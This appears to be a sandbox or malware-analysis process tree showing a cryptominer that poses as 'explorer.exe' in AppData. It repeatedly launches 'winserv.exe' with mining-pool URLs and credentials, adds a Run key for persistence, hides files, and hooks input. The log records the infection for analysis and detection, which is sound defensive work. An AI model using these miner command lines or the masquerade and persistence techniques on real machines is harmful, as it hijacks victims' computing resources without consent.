C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5116
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:876 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5240
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5432
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5536 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2472
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5816
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:744 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5560
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5252
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1520 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5944
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5732
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1448 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5992
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2064
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4544 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4868
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:1276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1564
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1992 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2516
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3712
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2756
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1004 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3552
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5076
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5788 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1676
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3420
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1480 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2456
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5848
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4248 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5800
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4748 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4956
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5044
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:464 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:6132
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2644
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4960 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3760
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4464
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4572 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2536
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2780
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2016 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5492
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2920
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:484 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2844
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3148
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4044 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2464
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2908
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1732 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3900
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2184
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5944 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5844
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5656
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:960 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1984
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3464
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3680 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2580
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5776
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1108 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1372
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3544
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1260 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:1596
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4704
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5832 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2816
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:244
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4904 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1268
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5080
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3272 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1860
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3360
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3660 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:3748
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5948
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:944 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5860
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3316
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5884 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4428
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3460
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2108 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:1680
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2280
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5492 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2844
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:740
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:484
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5512 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4092
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2904
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1360 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:1448
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:1496
-
-
-
